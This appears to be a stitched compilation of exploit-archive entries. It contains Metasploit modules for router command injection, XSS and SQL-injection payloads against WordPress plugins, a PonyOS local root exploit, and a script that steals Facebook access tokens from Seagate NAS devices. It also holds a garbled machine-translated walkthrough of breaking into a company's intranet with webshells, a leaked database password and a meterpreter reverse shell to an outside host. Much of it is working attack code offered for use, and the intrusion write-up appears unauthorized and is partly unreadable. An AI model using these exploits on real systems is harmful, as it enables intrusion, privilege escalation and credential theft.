[target['LibcBase'] + target['CallSystem']].pack('N') # $s5 - call system # 00041C10 move $t9, $s0 # 00041C14 jalr $t9 # 00041C18 nop shellcode << rand_text_alpha_upper(8) # unused registers $s6 - $s7 shellcode << [target['LibcBase'] + target['PrepareSystem']].pack('N') # write sp to $a0 -> parametre for call to system # 000215B8 addiu $a0, $sp, 0x20 # 000215BC lw $ra, 0x1C($sp) # 000215C0 jr $ra # 000215C4 addiu $sp, 0x20 shellcode << rand_text_alpha_upper(28) # padding shellcode << [target['LibcBase'] + target['CalcSystem']].pack('N') # add 1 to s0 (calculate system address) # 000111EC move $t9, $s5 # 000111F0 jalr $t9 # 000111F4 addiu $s0, 1 shellcode << cmd end def execute_command(cmd, opts) shellcode = prepare_shellcode(cmd) begin res = send_request_cgi({ 'method' => 'POST', 'uri' => '/cgi-bin/login', 'encode_params' => false, 'vars_post' => { 'redirect' => shellcode, 'user' => rand_text_alpha(5), 'password' => rand_text_alpha(8) } }) return res rescue ::Rex::ConnectionError fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server") end end end

=============================================================================== title: ClearPass Policy Manager Stored XSS case id: CM-2014-01 product: Aruba ClearPass Policy Manager vulnerability type: Stored cross-site script severity: Medium found: 2014-11-24 by: Cristiano Maruti (@cmaruti) =============================================================================== [EXECUTIVE SUMMARY] The analysis discovered a stored cross site scripting vulnerability (OWASP OTG-INPVAL-002) in the ClearPass Policy Manager. A malicious unauthenticated user is able to inject arbitrary script through the login form that may be rendered and triggered later if a privileged authenticated user reviews the access audit record. An attack can use the aforementioned vulnerability to effectively steal session cookies of privileged logged on users. [VULNERABLE VERSIONS] The following version of the Aruba ClearPass Policy Manager was affected by the vulnerability; previous versions may be vulnerable as well: - Aruba ClearPass Policy Manager 6.4 [TECHNICAL DETAILS] It is possible to reproduce the vulnerability following these steps: 1. Open the login page with your browser; 2. Put the "><img src=x onerror=alert(1337)><" string in the username field and fill in the password field with a value of your choice; 3. Submit the form; 4. Login to the application with an administrative user: 5. Go to "Monitoring -> Live monitoring -> Access tracker" to raise the payload. Below a full transcript of the HTTP request used to raise the vulnerability HTTP Request ------------------------------------------------------------------------------- POST /tips/tipsLoginSubmit.action HTTP/1.1 Host: 10.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Referer: https://10.0.0.1/tips/tipsLoginSubmit.action Cookie: <A VALID UNAUTH COOKIE> Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 58 username="><img src=x onerror=alert("0wn3d")><"&password=test ------------------------------------------------------------------------------- A copy of the report with technical details about the vulnerability I have identified is available at: https://github.com/cmaruti/reports/blob/master/aruba_clearpass.pdf [VULNERABILITY REFERENCE] The following CVE ID was allocated to track the vulnerability: - CVE-2015-1389: Stored cross-site scripting (XSS) [DISCLOSURE TIMELINE] 2014-11-24 Vulnerability submitted to vendor through the Bugcrowd bounty program. 2014-12-09 Vendor acknowledged the problem. 2014-12-10 Researcher requested to publicly disclose the issue. 2015-02-16 Vendor released a fix for the reported issue. 2015-02-09 Vendor asked to hold-on for the public disclosure. 2015-02-22 Vendor postponed the public disclosure date 2015-02-22 Public coordinated disclosure. [SOLUTION] Aruba release an update to fix the vulnerability (ClearPass 6.5 or later). Please see the below link for further information released by the vendor: - http://www.arubanetworks.com/assets/alert/ARUBA-PSA-2015-006.txt [REPORT URL] https://github.com/cmaruti/reports/blob/master/aruba_clearpass.pdf

## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager def initialize(info = {}) super(update_info(info, 'Name' => 'D-Link Devices HNAP SOAPAction-Header Command Execution', 'Description' => %q{ Different D-Link Routers are vulnerable to OS command injection in the HNAP SOAP interface. Since it is a blind OS command injection vulnerability, there is no output for the executed command. This module has been tested on a DIR-645 device. The following devices are also reported as affected: DAP-1522 revB, DAP-1650 revB, DIR-880L, DIR-865L, DIR-860L revA, DIR-860L revB DIR-815 revB, DIR-300 revB, DIR-600 revB, DIR-645, TEW-751DR, TEW-733GR }, 'Author' => [ 'Samuel Huntley', # first public documentation of this Vulnerability on DIR-645 'Craig Heffner', # independent Vulnerability discovery on different other routers 'Michael Messner <devnull[at]s3cur1ty.de>' # Metasploit module ], 'License' => MSF_LICENSE, 'References' => [ ['URL', 'http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10051'], ['URL', 'http://www.devttys0.com/2015/04/hacking-the-d-link-dir-890l/'] ], 'DisclosureDate' => 'Feb 13 2015', 'Privileged' => true, 'Platform' => 'linux', 'Targets' => [ [ 'MIPS Little Endian', { 'Arch' => ARCH_MIPSLE } ], [ 'MIPS Big Endian', # unknown if there are BE devices out there ... but in case we have a target { 'Arch' => ARCH_MIPSBE } ] ], 'DefaultTarget' => 0 )) deregister_options('CMDSTAGER::DECODER', 'CMDSTAGER::FLAVOUR') end def check uri = '/HNAP1/' soap_action = 'http://purenetworks.com/HNAP1/GetDeviceSettings' begin res = send_request_cgi({ 'uri' => uri, 'method' => 'GET', 'headers' => { 'SOAPAction' => soap_action, } }) if res && [200].include?(res.code) && res.body =~ /D-Link/ return Exploit::CheckCode::Detected end rescue ::Rex::ConnectionError return Exploit::CheckCode::Unknown end Exploit::CheckCode::Unknown end def exploit print_status("#{peer} - Trying to access the device ...") unless check == Exploit::CheckCode::Detected fail_with(Failure::Unknown, "#{peer} - Failed to access the vulnerable device") end print_status("#{peer} - Exploiting...") execute_cmdstager( :flavour => :echo, :linemax => 200, :temp => '' ) end def execute_command(cmd, opts) uri = '/HNAP1/' # we can not use / in our command so we need to use a little trick cmd_new = 'cd && cd tmp && export PATH=$PATH:. && ' << cmd soap_action = "http://purenetworks.com/HNAP1/GetDeviceSettings/`#{cmd_new}`" begin res = send_request_cgi({ 'uri' => uri, 'method' => 'GET', 'headers' => { 'SOAPAction' => soap_action, } }, 3) rescue ::Rex::ConnectionError fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server") end end end

source: https://www.securityfocus.com/bid/53519/info PDF & Print Button Joliprint plugin for WordPress is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and to launch other attacks. PDF & Print Button Joliprint 1.3.0 is vulnerable; other versions may also be affected. http://www.example.com/wp-admin/options-general.php?page=joliprint/joliprint_admin_options.php&amp;opt=%22%3E%3Cscript%3Ealert%281%29%3C/script%3E http://www.example.com/wp-content/plugins/joliprint/joliprint_options_upload.php?type=%3C/script%3E%3Cscript%3Ealert(1);%3C/script%3E

source: https://www.securityfocus.com/bid/53520/info CataBlog plugin for WordPress is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and to launch other attacks. CataBlog 1.6 is vulnerable; other versions may also be affected. http://www.example.com/wp-admin/admin.php?page=catablog-gallery&category="><script>alert(1)</script>

source: https://www.securityfocus.com/bid/53516/info Network Publisher plugin for WordPress is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and to launch other attacks. Network Publisher 5.0.1 is vulnerable; other versions may also be affected. http://www.example.com/wp-admin/plugins.php?page=networkpub

source: https://www.securityfocus.com/bid/53521/info The 2 Click Social Media Buttons plugin for WordPress is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and to launch other attacks. 2 Click Social Media Buttons 0.32.2 is vulnerable; other versions may also be affected. http://www.example.com/wp-content/plugins/2-click-socialmedia-buttons/libs/pinterest.php?pinterest-url=%22%3E%3Cscript%3Ealert%281%29%3C/script%3E&pinterest-description=1 http://www.example.com/wp-content/plugins/2-click-socialmedia-buttons/libs/xing.php?xing-url=%22%3E%3C/script%3E%3Cscript%3Ealert%281%29%3C/script%3E

source: https://www.securityfocus.com/bid/53522/info The iFrame Admin Pages plugin for WordPress is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and to launch other attacks. iFrame Admin Pages 0.1 is vulnerable; other versions may also be affected. http://www.example.com/wp-content/plugins/iframe-admin-pages/main_page.php POST DATA: url=&quot;&gt;&lt;script&gt;alert(1)&lt;/script&gt;&amp;newiframe=new&amp;servicerequest=new

/* # Exploit Title: PonyOS <= 3.0 tty ioctl() local kernel exploit # Google Dork: [if applicable] # Date: 29th June 2015 # Exploit Author: HackerFantastic # Vendor Homepage: www.ponyos.org # Software Link: [download link if available] # Version: [app version] PonyOS <= 3.0 # Tested on: PonyOS 3.0 # CVE : N/A # Source: https://raw.githubusercontent.com/HackerFantastic/Public/master/exploits/applejack.c */ /* PonyOS <= 3.0 tty ioctl() root exploit ======================================== PonyOS 0.4.99-mlp had two kernel vulnerabilities disclosed in April 2013 that could be leveraged to read/write arbitrary kernel memory. This is due to tty winsize ioctl() allowing to read/write arbitrary memory. This exploit patches the setuid system call to remove a root uid check allowing any process to obtain root privileges. John Cartwright found these flaws and others here: https://www.exploit-db.com/exploits/24933/ Written for educational purposes only. Enjoy! -- prdelka */ #include <stdio.h> #include <stdlib.h> #include <sys/ioctl.h> int main(){ struct winsize ws; printf("[+] PonyOS <= 3.0 ioctl() local root exploit\n"); memcpy(&ws,"\x90\x90\x90\x90\x8b\x45\x08\x89",8); ioctl(0, TIOCSWINSZ, &ws); ioctl(0, TIOCGWINSZ, (void *)0x0010f101); printf("[-] patched sys_setuid()\n"); __asm("movl $0x18,%eax"); __asm("xorl %ebx,%ebx"); __asm("int $0x7F"); printf("[-] Got root?\n"); system("/bin/sh"); }

################################################################################################### # Exploit Title: WordPress LeagueManager SQLi # Version: 3.9.11 # Vendor: https://wordpress.org/plugins/leaguemanager # Software Link: https://downloads.wordpress.org/plugin/leaguemanager.3.9.1.1.zip # Author: javabudd # Date: 06/01/2015 # Tested on: Linux | Windows ################################################################################################### Vulnerabilities (2) ========================== (1) Unauthenticated SQLi [CWE-89] CODE: lib/core.php (785) ++++++++++++++++++++++++++ function getMatch() is passed an unsanitized $match_id parameter to the SQL query ++++++++++++++++++++++++++ POC: http://localhost/?match=1 SQLMap ++++++++++++++++++++++++++ python sqlmap.py --url "http://localhost/?match=1" --level 5 --risk 3 --dbms mysql ++++++++++++++++++++++++++ --- Parameter: match (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: match=1 AND 3991=3991 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: match=1 AND (SELECT 8344 FROM(SELECT COUNT(*),CONCAT(0x7178717671,(SELECT (ELT(8344=8344,1))),0x717a707a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: match=1 AND (SELECT * FROM (SELECT(SLEEP(5)))LCcI) Type: UNION query Title: Generic UNION query (NULL) - 20 columns Payload: match=-9496 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7178717671,0x4945496f7a7062675158,0x717a707a71),NULL-- --- [02:18:52] [INFO] the back-end DBMS is MySQL web application technology: PHP 5.5.20, Apache 2.4.10 back-end DBMS: MySQL 5.0 (2) Unauthenticated SQLi [CWE-89] Code: lib/core.php (486) ++++++++++++++++++++++++++ function getLeague() is passed an unsanitized $league_id parameter from the constructor ++++++++++++++++++++++++++ POC: http://localhost?season=1&league_id=1&match_day=1&team_id=1 SQLMAP ++++++++++++++++++++++++++ python sqlmap.py --url "http://localhost?season=1&league_id=1&match_day=1&team_id=1" --dbms mysql --level 5 --risk 3 -p league_id ++++++++++++++++++++++++++ --- Parameter: league_id (GET) Type: error-based Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE) Payload: season=1&league_id=1' AND EXTRACTVALUE(4330,CONCAT(0x5c,0x7178717671,(SELECT (ELT(4330=4330,1))),0x717a707a71)) AND 'SOeQ'='SOeQ&match_day=1&team_id=1 Type: AND/OR time-based blind Title: MySQL <= 5.0.11 AND time-based blind (heavy query) Payload: season=1&league_id=1' AND 9638=BENCHMARK(5000000,MD5(0x54624c4e)) AND 'GmZI'='GmZI&match_day=1&team_id=1 --- [03:31:55] [INFO] the back-end DBMS is MySQL web application technology: PHP 5.5.20, Apache 2.4.10 back-end DBMS: MySQL 5.1

source: https://www.securityfocus.com/bid/53523/info Newsletter Manager plugin for WordPress is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and to launch other attacks. http://www.example.com/wp-admin/admin.php?page=newsletter-manager-emailcampaigns&action=test_mail&id=1&pageno=1&id="><script>alert(document.cookie);</script>

0x01はじめに イントラネットの浸透とMSFの使用を学習するために、このテストのターゲットとして特定の台湾技術グループの下でサイトをランダムに見つけました。 2013年9月に、サブドメインのWebシェル許可を取得し、テストを継続しませんでした。当時、Symantecはサーバーにインストールされていませんでしたが、2回目のテストに行ったとき、Symantecがインストールされ、いくつかのセキュリティ強化が実行されたことがわかりました。 0x02ウェブサイトとイントラネットの基本情報コレクション基本情報検出：ターゲットサイト：http://wwww.ttes *****。コムサーバーIP：59。予想外に、彼らはウェブシェル（fckeditor）を非常にスムーズに手に入れました。メインサイトが脆弱性を見つけることができない場合は、「サイドステーション」または「サブドメイン」を開始できます。 この記事では、MSFツールの使用と困難の解決に焦点を当てているため、WebShellを取得する方法についてはあまり説明しません。許可を取得した後に収集されたサーバー情報は次のとおりです。 ポートオープン：25、80、135、445、1025、1521、3389パッチステータス：サーバーシステムには460+パッチ（64ビット）スクリプト検出があります。サーバーはASPおよびASPX拡張名ディスク許可をサポートしています。 ipconfig /allコマンドは、ホスト名がwebsrv4、ip：192.168.0.203、dns：192.168.3.1であることを確認できます。 Windows IP構成ホスト名。 。 websrv4接続固有のDNSサフィックス。 IPアドレス。 。 192.168.0.203サブネットマスク。 。 255.255.255.0デフォルトゲートウェイ。 。 192.168.0.254 DNSサーバー。 。 192.168.3.1 168.95.1.1NETビュー /ドメインコマンドは、2つのドメインとワークグループがあることを確認できます：7PV1V1S、TT、ワークグループ、および生存するホストの対応するIPアドレスがワークグループに示されています。 多くのTTドメインホストがあり、別のテーブルが配置されています。ドメイン制御は次のとおりです。192.168.3.1。ここでは、ワーキンググループと各ドメインの組織構造と、あなた自身の経験に基づいて各ホストが演じる役割を分析できます。 0x03 WebShell Power-Enhanced Defense Software このホスト制御ホストの現在のシステムは、Windows 2003 x64です。 X64に利用できるExpがあまりないことは知っていますが、試してみる必要があります。結果はすべて失敗します。オラクルは、権力のエスカレーションにさらされたことがなく、私はそれについてあまり知りません。私はそれを脇に置きます。 ASPXとMSSQLが最高のパートナーであることを誰もが知っています。 web.config構成ファイルでデータベース接続情報を見つけます。ここでは、MSSQLデータベースが、サイトライブラリの分離であるIntranet 192.168.0.0.206のホストで実行されていることがわかります。 name='ttes ***** _ enconnectionString1' connectionString='data source=192.168.0.206;初期カタログ=ttes ***** _グローバル;永続セキュリティ情報=true; user id=sa; password=tt@12345' providername='system.data.sqlclient'/next next next next next next noct of to next next nect of to next nex 192.168.0.0.206、XP_CMDSHELLコンポーネントがコマンドを実行して管理者ユーザーを追加してから、PORTFWDコマンドを使用してポート3389ポートを転送します。 注：一部の学生は、マレーシアでポートマッピング機能を直接使用することは大丈夫だと言うかもしれませんが、とにかく成功していません。私の姿勢に何か問題があるのだろうか。まあ、それはそうでなければならない、それはまだ悪いです！ Test $ Administratorユーザーが正常に追加され、次のステップはLCXポート転送ツールを使用することです。誰もが203のホストでアップロードおよび実行されていることを理解する必要がありますが、206のデータベースホストのうち3389です。 c: \ recycler \ lcx.exe-外部ネットワークIP 51 192.168.0.206 3389注：192.168.0.0.203このホストには防御ソフトウェアはありません。 LCX.exeを読み取り可能な書き込み可能なディレクトリに直接アップロードして、正常に実行できます。ただし、記事を書くとき、Symantecがインストールされていることがわかりました。 LCX.EXEおよびさまざまなExpsは、アップロードプロセス中にブロックされています。また、一般的に使用されるVBS、BAT、EXE、アップロード、ダウンロード、修正、展開メソッド、および悪意のある動作として検出される操作を試しました。 Symantecエンドポイント保護プロセス：SMC.EXE、SNAC.EXE、CCSVCHST.EXE、RTVSCAN.EXESYMANTECエンドポイント保護防衛ソフトウェアのリスクログは、デフォルトで14日間のみ保存されます。サーバーを入力した後、それ自体で設定できます。後のテストでは、下の図に示すように、FCKEDITORが共通：1文、ポニー、マレーシアなどなど、FCKEDITORがWebShellをアップロードしたときにも傍受されたことがわかりました。 WAFを通過した馬をより多くの馬にテストして、バイパスできるかどうかを確認できますか？ テスト記録：1。イントラネット環境、サイトライブラリ分離、web.configはデータ（192.168.0.206）SAユーザーを見つけて、管理者ユーザーを正常に追加しました。 2。Web（192.168.0.203）およびデータ（192.168.0.206）はSymantecをインストールしており、LCX.exeおよびその他のツールを使用できません。 3.他の転送ツールをテストした後、それらは傍受されるか使用できず、Reduhは現在の203を転送することができ、速度は非常に遅くなります。 4.MSFPayloadによって生成されたEXEファイルも検出され、サーバーはX64であり、MSFENCODEにはX64エンコーダーがないため、この道路はアクセスできません。 0x04ポート転送用の防御ソフトウェアをバイパス Google検索を通じて記事でアイデアを入手し、MSFPayLoadを使用してASPXリバウンドスクリプトを生成し、MeterPreterセッションを取得し、PortFWDコマンドを使用してデータベースサーバーの3389ポート192.168.0.206を転送します。 MSFPayload Windows/x64/meterpreter/reverse_tcp lhost=113。***。*。238 lport=12345 r | MSFENCODE -T ASPX -O/MEDIA/SF_SYSTEM LEANDING/test.aspx MSFCONSOLELは、リスニング関連のオプションを構成し、新しく生成されたtest.aspxリバウンドスクリプトをWebサイトのWebディレクトリにアップロードし、ブラウザにアクセスしてターゲットホストセッションを取得します。 root@box3:〜＃msfconsolemsfの使用exploit/multi/handlermsf exploit（handler）set payload windows/x64/meterpreter/reverse_tcpmsf exploit（handler）set lhost 192.168.1.7msf exploit（handler）set lport 12345msf exploit（handler）exploit（handler）set lport 次に、データベースサーバー192.168.0.206のPortfWDコマンドをイントラネットで転送し、3389リモート端子に正常に接続できます。関連するコマンドパラメーターは次のとおりです。その時にスクリーンショットを撮るのを忘れていました！ MeterPreter Portfwd Add -L 1234 -P 3389 -R 192.168.0.206 [*]ローカルTCPリレーCreated: 0.0.0.033601234-192.168.0.20633603389 usage: portfwd [-h] [add |削除|リスト|フラッシュ] [args]削除リストの更新パラメーターを追加します options: -hヘルプバナー。 //help -lローカルホストを選択して聴く（オプション）。 //ローカルIPアドレス-Lローカルポートを選択してリッスンします。 //ローカルポート番号-Rリモートホストを選択して接続します。 //リモートIPアドレス-pリモートポートを選択して接続します。 //リモートポート番号次に、SOCKS4Aプロキシを使用してMSFに接続する場合、イントラネットの3389について説明します。 Socks4Aプロキシを開く前に、最初にMeterPreterセッションを取得し、次にSocks4Aモジュールを直接使用してプロキシを有効にし、デフォルトで実行する必要があります。 MSF Auxiliary（Socks4a）auxiliary/server/socks4amsf Auxiliary（socks4a）set srvhost 127.0.1msf Auxiliary（socks4a）run [*]補助モジュール実行完了completedmsf Auxiliary（socks4a）[*] Proxychains Proxyツールを構成するには、 /etc/proxychains.confファイル1080」の下部に「socks4127.0.0.0.1」を追加する必要があります。SOCKS4AモジュールのSRVHOSTおよびSRVPORTパラメーターが一貫していることを確認する必要があります。 root@box3:〜＃VI /etc/proxychains.conf socks4aプロキシを有効にし、プロキシチャインプロキシツールを構成します。現時点では、プロキシProxy Proxy MSF/NMAP/SQLMAP/NESSUS/MYSQL/SQSH/RDESKTOP/FTP/SSHおよびターゲットイントラネットの他のホストを使用して、コマンド末端のターゲットイントラネットの他のホストをスキャンおよびテストすることができます。 root@box3:〜＃proxychains msfconsole root@box3:〜＃proxychains rdesktop 192.168.0.206注：socks4a proxyが有効になっている場合、正常に使用できない場合、それはファイアウォールの問題である可能性があります。この時点では、SRVHOSTパラメーターを127.0.0.1に設定してみてください。デフォルトは0.0.0.0、ポートは1080です。エージェントの開口部とプロキシツールを混同しないことを忘れないでください。 2014-07-28：もう一度テストした後、元の方法を使用して跳ね返ることができないことがわかりました。その後、Reduh_gui、reverse_tcp 80ポート.およびその他の方法を試しました。データはすべて接続されており、TCP接続ステータスは次のとおりでしたが、接続は許可されていないか、セッションが跳ね返られませんでした。 の最終的なブレークスルーとその後のアイデア：LCX.EXEツールを使用してポート80をローカルに監視し、192.168.0.206データベースサーバーに入った後にSymantec Defenseソフトウェアを無効にし、MSF攻撃ペイロードを実行し、Intranetの他のホストをさらに侵入します。 0x05セグメントCとシステムバージョンのオープンポートを取得 現在のセッションでは、get_local_subnetsスクリプトを使用してローカルサブネットセグメントを取得し、Kaliローカルマシンでルーティングテーブルを確立してクロスルーティングアクセスを実現します。これにより、MSFフレームワークの下のモジュールを使用して、ターゲットイントラネットの他のホストをスキャンおよびテストできます。 MeterPreter Run get_local_subnetslocal subnet: 192.168.0.0/255.255.255.0meterpreter run autoroute -s 192.168.0.0/255.255.255.0 [*] 59。***。**。66 [*] -pオプションを使用して、すべてのアクティブルート//1はセッションのセッションIDです。ルーティングされたときに間違いを犯さないでください！ MSFエクスプロイト（ハンドラー）ルート追加192.168.0.0 255.255.255.0 1 //このモジュールは、Cセグメントホスト全体のポート開口部を簡単に検出でき、後の浸透テストで簡単にできるようになります。 ここで、著者は主にこれらの一般的なポートをスキャンします：21/22/445/1433/3306/3389デモンストレーション。他のより一般的なポートは次のとおりです。23/25/80/110/135/1521/8080/14147/43958など。 MSFエクスプロイト（ハンドラー）使用補助/スキャナー/ポートスキャン/TCPMSF補助（TCP）SET RHOSTS 192.168.0.1-254MSF補助（TCP）セットポート21,22,445,1433,3306,3389MSF Auxilary（TCP）セット（TCP）50MSPINIS（TCP）SESWS SWANDS が遅すぎる場合は、スレッドを適切に増やすことを選択できます。スキャンプロセス中にしばらく待つ必要があります。終了後、ホストやサービスなどのコマンドパラメーターを使用して、スキャン結果を表示できます。前提は、PostgreSQLデータベースに接続することです。ポートスキャンの結果は、下の図に示すように示されています。 次のモジュールを使用して、生存ホスト、システムバージョン、ソフトウェアバージョン、コンピューター名、MACアドレス、ワーキンググループまたはドメインなどに関する情報を検出することもできます。 補助/スキャナー/ポートスキャン/TCP 補助/スキャナー/ポートスキャン/ACK 補助/スキャナー/ポートスキャン/syn 補助/スキャナー/ftp/ftp_version 補助/スキャナー/ssh/ssh_version 補助/スキャナー/SMB/SMB_Version 補助/スキャナー/DNS/DNS_AMP 補助/スキャナー/http/タイトル 補助/スキャナー/http/http_version 補助/スキャナー/telnet/telnet_version 補助/スキャナー/mysql/mysql_version 補助/スキャナー/postgres/postgres_version 補助/スキャナー/netbios/nbname 補助/スキャナー/netbios/nbname_probe //削除 補助/スキャナー/ディスカバリー/arp_sweep 補助/スキャナー/ディスカバリー/udp_probe 補助/スキャナー/ディスカバリー/udp_sweep [.切り取り.] 0x06共通サービスブルートフォースモジュール サードパーティ、SSH/RDP、さまざまなWebサイト/データベース、テキスト、またはテーブルに保存されているユーザーパスワードを含む、より多くのユーザー、パスワード、およびその他の情報を収集するホストに関する情報を収集し、それらを分析して、ルールまたは共通の可能性があるかどうかを確認します。ある場合は、ルールに基づいて効率的な辞書を生成し、次のモジュールをブラストと利用に使用できます。写真は@offsecから来ています！ 注：この記事を再編集する際には、一部のモジュールも新しく追加されています。彼らは再編成されているので、なぜそれらのいくつかをしないのですか？強迫性障害が再び行われます！これらも頻繁に使用します。マスターに他の一般的に使用されるモジュールがある場合は、それらを追加することもできます。 auxiliary/scanner/ftp/anonymousauxiliary/scanner/ftp/ftp_loginaauxiliary/scanner/ssh/ssh_loginaauxiliary/scanner/ssh/ssh_login_pubkeyauxiliary/dos/windows/ftp/filezilla_admin_userauxiliary/dos/windows/ftp/filez Illa_server_portpost/windows/ghather/credentials/flashfxppost/windows/ghather/credentiencys/smartftppost/windows/credentiences/wsftp_clientpost/windows/credentiences/filezilla_serverpost/windows/ghatcher/c Redentions/xshell_xftp_passwordpost/multi/graching/filezilla_client_credaauxiliary/scanner/smb/smb_loginaauxiliary/admin/smb/upload_fileexploit/windows/smb/psexecexploit/windows/smb/ms08_067_nepiaiary/scann ER/SMB/SMB_MS17_010EXPLOIT/WINDOWS/SMB/MS17_010_PSEXECAUXILIARY/ADMIN/SMB/MS17_010_COMMANDEXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUEEXPLOIT/WINDOWS/SMB/SMB/SMB/Web/smb/smb/smb/smb/smb/smb/smb/smb/smb/smb/smb/smb/smb/smb/smb/smb/smb/smb/smb/smb/smb /smb/infacket/wmiexecauxiliary/admin/mysql/mysql_enumauxiliary/admin/mysql/mysql_sqlauxiliary/scanner/mysql/mysql_login AAUXILIARY/SCANNER/MYSQL/MYSQL_LOGINAOUXILIARY/SCANNER/MYSQL/MYSQL_HASHDUMPEXPLOIT/WINDOWS/MYSQL/MOFEXPLOIT/MULTI/MYSQL/MYSQL/mysql_udf_payloadauxiliary/admin/mssql/mssql_enumauxiliary/admin/mssql/mssql_execauxiliary/admin/mssql/m ssql_sqlauxiliary/admin/mssql/mssql_escalate_dbownerauxiliary/scanner/mssql/mssql_pingauxiliary/scanner/m SSQL/MSSQL_LOGINAAUXILIARY/SCANNER/MSSQL/MSSQL_HASHDUMPEXPLOIT/MSSQL/MSSQL_CLR_CLR_CLR_CLR_CLR_CLR_CLR_CLR_CLR_CLR_CLR_CLR_CLR_CLR_CLR_CLR/MSSQL_PAYLOADEXPLOIT/WINDOWS/MSSQL/MSSQL_PAYLOADEXPLOIT/MSSQL_PAYLOADEXPLOIT s/ghatcher/enum_termservpost/windows/ghather/credentials/mremoteauxilary/scanner/rdp/ms12_020_checkauxiliary/dos/windows/rdp/ms12_020_maxchannelidsauxiliary/scanner/rdp/cve_2019_0707070708_blueeepexploit/rdpeepexploit/rdpeepexploit

#!/usr/bin/python # seagate_central_facebook.py # # Seagate Central Remote Facebook Access Token Exploit # # Jeremy Brown [jbrown3264/gmail] # May 2015 # # -Synopsis- # # Seagate Central stores linked Facebook account access tokens in /etc/archive_accounts.ser # and this exploit takes advantage of two bugs: # # 1) Passwordless root login via FTP to retrieve archive_accounts.ser file which contains access tokens # 2) Reuses the unencrypted and unprotected (-rw-r--r--) access tokens for a chosen scope to return data # # -Example- # # > seagate_fb_accounts.py getaccesstoken 1.2.3.4 # # 'archive_accounts.ser' # # a:1:{s:8:"facebook";a:1:{s:29:"user3535@facebook.com";a:5:{s:7:"service";s:8:"facebook";s:4: # "user";s:29:"user3535@facebook.com";s:5:"owner";s:4:"test";s:6:"folder";s:7:"private";s:5:"t # oken";s:186:"CAAxxxxxxxx..." # ;}}} # # Next, try this: # # > seagate_fb_accounts.py CAAxxxxxxxx... friends # server response: # # {'data': [{'name': 'Jessie Taylor', 'id': '100000937485968'}, {'name': 'Kellie Youty', 'id': '1 # 00000359801427'}, {'name': 'Hope Maynard', 'id': '10000102938470'}, {'name': 'Angel Tucker Pole', 'id' # : '100001402808867'}, {'name': 'Malcolm Vance', 'id': '10000284629187'}, {'name': 'Tucker Civile', 'id': # ..... # # Scopes Reference: https://developers.facebook.com/docs/graph-api/reference/v2.1/user # # -Fixes- # # Seagate scheduled updates to go live on April 28th, 2015. # # Tested version: 2014.0410.0026-F # import sys import json from urllib import request # python3 from ftplib import FTP fb_url = "https://graph.facebook.com" fb_filename = "archive_accounts.ser" def getaccesstoken(host): try: ftp = FTP(host) ftp.login("root") ftp.retrbinary("RETR " + "/etc/" + fb_filename, open(fb_filename, 'wb').write) ftp.close() except Exception as error: print("Error: %s" % error) return try: with open(fb_filename, 'r') as file: data = file.read() except Exception as error: print("Error: %s" % error) return print("\n'%s'\n\n%s\n\n" % (fb_filename, data)) return def main(): if(len(sys.argv) < 2): print("Usage: %s <key> <scope> OR getaccesstoken <host>\n" % sys.argv[0]) print("scopes: albums feed friends likes picture posts television") return if(sys.argv[1] == "getaccesstoken"): if(len(sys.argv) == 3): host = sys.argv[2] res = getaccesstoken(host) else: print("Error: need host to retrieve access token file\n") return else: key = sys.argv[1] if(len(sys.argv) == 3): scope = sys.argv[2] else: scope = "" try: response = request.urlopen(fb_url + "/me/" + scope + "?access_token=" + key).read() except Exception as error: print("Error: %s" % error) return data = json.loads(response.decode('utf-8')) print("server response:\n\n%s\n" % data) return if __name__ == "__main__": main()